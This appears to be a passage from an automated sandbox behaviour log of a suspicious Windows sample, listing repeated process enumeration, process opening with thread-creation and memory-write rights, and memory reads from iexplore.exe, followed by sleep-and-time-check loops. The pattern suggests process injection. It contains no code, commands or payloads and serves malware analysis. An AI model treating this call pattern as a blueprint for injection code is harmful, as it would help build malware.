Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2147332096, size = 472	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2822592, size = 656	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2824600, size = 32	1	Fn Data
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2147344384, size = 472	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 594368, size = 656	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 596410, size = 32	1	Fn Data
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
System	Sleep	duration = 100 milliseconds (0.100 seconds)	1	Fn
Process	Enumerate Processes	-	3	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
For performance reasons, the remaining 34281 entries are omitted. The remaining entries can be found in glog.xml.

Thread 0x670

2228

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:33:17 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:27 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:37 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:47 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:47 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:47 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:47 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:47 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:47 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:47 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
